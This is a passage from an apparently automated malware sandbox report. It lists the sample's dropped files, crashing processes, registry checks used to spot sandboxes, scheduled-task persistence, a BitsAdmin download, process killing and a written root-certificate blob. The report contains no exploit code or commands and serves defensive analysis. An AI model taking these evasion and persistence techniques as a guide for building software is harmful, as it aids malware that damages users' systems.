File created C:\Program Files (x86)\lighteningplayer\lua\http\requests\vlm.xml autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\demux\librawvid_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\plugins.dat.3268 lighteningplayer-cache-gen.exe File created C:\Program Files (x86)\lighteningplayer\lua\sd\icecast.luac autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\control\libnetsync_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\css\mobile.css autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\images\buttons.png autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\lua\http\js\common.js autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\mux\libmux_ps_plugin.dll autosubplayer.exe File created C:\Program Files (x86)\lighteningplayer\plugins\packetizer\libpacketizer_mlp_plugin.dll autosubplayer.exe -
Drops file in Windows directory 30 IoCs
Processes:
msiexec.exesvchost.exeWerFault.exeMsiExec.exerundll32.exedescription ioc process File opened for modification C:\Windows\Installer\MSI7A4D.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7B59.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7D8F.tmp msiexec.exe File opened for modification C:\Windows\Tasks\SA.DAT svchost.exe File created C:\Windows\AppCompat\Programs\Amcache.hve.tmp WerFault.exe File opened for modification C:\Windows\Installer\MSI7E5D.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\Installer\MSI9013.tmp msiexec.exe File created C:\Windows\Tasks\AdvancedWindowsManager #1.job MsiExec.exe File opened for modification C:\Windows\Installer\MSI7DCF.tmp msiexec.exe File created C:\Windows\SystemTemp\~DF9344B67CD13E390A.TMP msiexec.exe File opened for modification C:\Windows\Installer\MSI9592.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7B29.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI8246.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI9739.tmp msiexec.exe File opened for modification C:\Windows\Installer\167cd.msi msiexec.exe File opened for modification C:\Windows\Installer\MSI7BA8.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{C845414C-903C-4218-9DE7-132AB97FDF62} msiexec.exe File created C:\Windows\SystemTemp\~DF9E006D9BD4E62DD6.TMP msiexec.exe File created C:\Windows\Tasks\JFLQwz.job rundll32.exe File created C:\Windows\Installer\167cd.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI6E93.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7A3D.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\Installer\MSI82D3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7BE8.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI7D31.tmp msiexec.exe File created C:\Windows\SystemTemp\~DFD526AE8461072B10.TMP msiexec.exe File created C:\Windows\SystemTemp\~DF69FD63E47FFA7B44.TMP msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 24 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 5764 3572 WerFault.exe Sun19de8ff4b6aefeb8.exe 5876 4660 WerFault.exe Sun1908b94df837b3158.exe 5900 4628 WerFault.exe Sun19eb40faaaa9.exe 5428 6084 WerFault.exe 2.exe 5848 1168 WerFault.exe Sun19262b9e49ad.exe 660 6108 WerFault.exe rundll32.exe 5980 5316 WerFault.exe 5.exe 4912 4688 WerFault.exe setup.exe 4984 5212 WerFault.exe udptest.exe 4940 5252 WerFault.exe rundll32.exe 2056 1432 WerFault.exe GcleanerEU.exe 3192 2032 WerFault.exe gcleaner.exe 5340 5632 WerFault.exe rundll32.exe 6368 1368 WerFault.exe DVqoN_M2hyOJuqKLhZl3Zhf2.exe 6764 6336 WerFault.exe DyzW75Vg9OFYpumqyTL2gvjP.exe 6600 2948 WerFault.exe YZb540BezbbpKeaGGc138FrF.exe 6176 1956 WerFault.exe m1dOwok5aPcrur45Ch_l6GVs.exe 5632 5288 WerFault.exe 98zXQtfds9_B8K1wkYwThy5h.exe 2204 6096 WerFault.exe 5cyMyMfaTHF5mm4GGWje7aCw.exe 6952 3388 WerFault.exe explorer.exe 2800 6324 WerFault.exe ynpFKcNZI9p6eFlM1OP158SD.exe 500 6208 WerFault.exe f8PpilxAOrTr28KiG99opgqy.exe 588 6344 WerFault.exe rundll32.exe 6748 6344 WerFault.exe rundll32.exe -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
QSydSxCGLaGDRZ1oU1LJVgeo.exedescription ioc process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI QSydSxCGLaGDRZ1oU1LJVgeo.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI QSydSxCGLaGDRZ1oU1LJVgeo.exe Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI QSydSxCGLaGDRZ1oU1LJVgeo.exe -
Checks processor information in registry 2 TTPs 64 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.execmd.exeConhost.exeWerFault.exeWerFault.exeWerFault.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 cmd.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 Conhost.exe -
Creates scheduled task(s) 1 TTPs 8 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exeschtasks.exepid process 6076 schtasks.exe 476 schtasks.exe 5108 schtasks.exe 5376 schtasks.exe 2608 schtasks.exe 6384 schtasks.exe 6232 schtasks.exe 5224 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
Processes:
timeout.exepid process 4032 timeout.exe -
Download via BitsAdmin 1 TTPs 1 IoCs
-
Enumerates system info in registry 2 TTPs 53 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exemsedge.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeConhost.exeWerFault.exeWerFault.execmd.exeWerFault.exeWerFault.exeInstall.exeInstall.exedescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Conhost.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Conhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WerFault.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU cmd.exe Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WerFault.exe -
Kills process with taskkill 2 IoCs
Processes:
taskkill.exetaskkill.exepid process 2384 taskkill.exe 6620 taskkill.exe -
Modifies data under HKEY_USERS 46 IoCs
Processes:
sihclient.exemsiexec.exesvchost.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\8 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates sihclient.exe Key deleted \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\7 msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs sihclient.exe Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\7\52C64B7E msiexec.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs sihclient.exe Key created \REGISTRY\USER\S-1-5-19\Software\Classes\Local Settings\MuiCache\8\52C64B7E svchost.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs sihclient.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs sihclient.exe -
Modifies registry class 5 IoCs
Processes:
description ioc process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{5b934b42-522b-4c34-bbfe-37a3ef7b9c90}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{f8278c54-a712-415b-b593-b77a2be0dda9}\Instance\ Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\ Key created \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\ -
Processes:
installer.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 040000000100000010000000d474de575c39b2d39c8583c5c065498a0f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc30b00000001000000120000004400690067006900430065007200740000001d00000001000000100000008f76b981d528ad4770088245e2031b630300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc25190000000100000010000000ba4f3972e7aed9dccdc210db59da13c92000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100c6cce573e6fbd4bbe52d2d32a6dfe5813fc9cd2549b6712ac3d5943467a20a1cb05f69a640b1c4b7b28fd098a4a941593ad3dc94d63cdb7438a44acc4d2582f74aa5531238eef3496d71917e63b6aba65fc3a484f84f6251bef8c5ecdb3892e306e508910cc4284155fbcb5a89157e71e835bf4d72093dbe3a38505b77311b8db3c724459aa7ac6d00145a04b7ba13eb510a984141224e656187814150a6795c89de194a57d52ee65d1c532c7e98cd1a0616a46873d03404135ca171d35a7c55db5e64e13787305604e511b4298012f1793988a202117c2766b788b778f2ca0aa838ab0a64c2bf665d9584c1a1251e875d1a500b2012cc41bb6e0b5138b84bcb0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e04160414b13ec36903f8bf4701d498261a0802ef63642bc3301f0603551d23041830168014b13ec36903f8bf4701d498261a0802ef63642bc3300d06092a864886f70d010105050003820101001c1a0697dcd79c9f3c886606085721db2147f82a67aabf183276401057c18af37ad911658e35fa9efc45b59ed94c314bb891e8432c8eb378cedbe3537971d6e5219401da55879a2464f68a66ccde9c37cda834b1699b23c89e78222b7043e35547316119ef58c5852f4e30f6a0311623c8e7e2651633cbbf1a1ba03df8ca5e8b318b6008892d0c065c52b7c4f90a98d1155f9f12be7c366338bd44a47fe4262b0ac497690de98ce2c01057b8c876129155f24869d8bc2a025b0f44d42031dbf4ba70265d90609ebc4b17092fb4cb1e4368c90727c1d25cf7ea21b968129c3c9cbf9efc805c9b63cdec47aa252767a037f300827d54d7a9f8e92e13a377e81f4a installer.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\5FB7EE0633E259DBAD0C4C9AE6D38F1A61C7DC25\Blob = 5c000000010000000400000000080000190000000100000010000000ba4f3972e7aed9dccdc210db59da13c90300000001000000140000005fb7ee0633e259dbad0c4c9ae6d38f1a61c7dc251d00000001000000100000008f76b981d528ad4770088245e2031b630b0000000100000012000000440069006700690043006500720074000000140000000100000014000000b13ec36903f8bf4701d498261a0802ef63642bc36200000001000000200000007431e5f4c3c1ce4690774f0b61e05440883ba9a01ed00ba6abd7806ed3b118cf090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000014000000e35ef08d884f0a0ade2f75e96301ce6230f213a8040000000100000010000000d474de575c39b2d39c8583c5c065498a2000000001000000c9030000308203c5308202ada003020102021002ac5c266a0b409b8f0b79f2ae462577300d06092a864886f70d0101050500306c310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312b30290603550403132244696769436572742048696768204173737572616e636520455620526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a306c310b300906035504061302555331153013060355040a130c446